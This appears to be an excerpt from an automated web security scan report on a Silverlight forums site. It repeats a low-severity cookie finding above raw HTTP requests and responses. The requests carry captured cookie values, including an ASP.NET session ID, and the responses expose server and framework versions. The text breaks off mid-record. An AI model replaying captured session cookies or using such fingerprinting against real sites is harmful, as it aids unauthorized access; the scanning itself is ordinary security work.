The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/51.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 68826 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:25 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/52.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 68254 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:00 GMT; expires=Sun, 29-Jan-2012 23:18:00 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:02 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/53.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73495 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:54 GMT; expires=Sun, 29-Jan-2012 23:17:54 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:54 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/56.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 61545 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/59.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73671 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:30 GMT; expires=Sun, 29-Jan-2012 23:17:30 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:30 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/63.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 71202 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:04 GMT; expires=Sun, 29-Jan-2012 23:18:04 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:05 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/64.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 71929 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:48 GMT; expires=Sun, 29-Jan-2012 23:17:48 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:48 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/65.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 64898 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:42 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/66.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 65198 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:05 GMT; expires=Sun, 29-Jan-2012 23:18:05 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:06 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/67.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 65193 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:43 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/68.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 76391 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:58 GMT; expires=Sun, 29-Jan-2012 23:17:58 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73694 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:39 GMT; expires=Sun, 29-Jan-2012 23:20:39 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:40 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217026/518297.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 107413 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:38 GMT; expires=Sun, 29-Jan-2012 23:20:38 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217498/518305.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 58467 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:55 GMT; expires=Sun, 29-Jan-2012 23:19:55 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:55 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217562/518302.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 31591 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:16 GMT; expires=Sun, 29-Jan-2012 23:20:16 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:16 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217667/518301.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 31838 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:17 GMT; expires=Sun, 29-Jan-2012 23:20:17 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:17 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
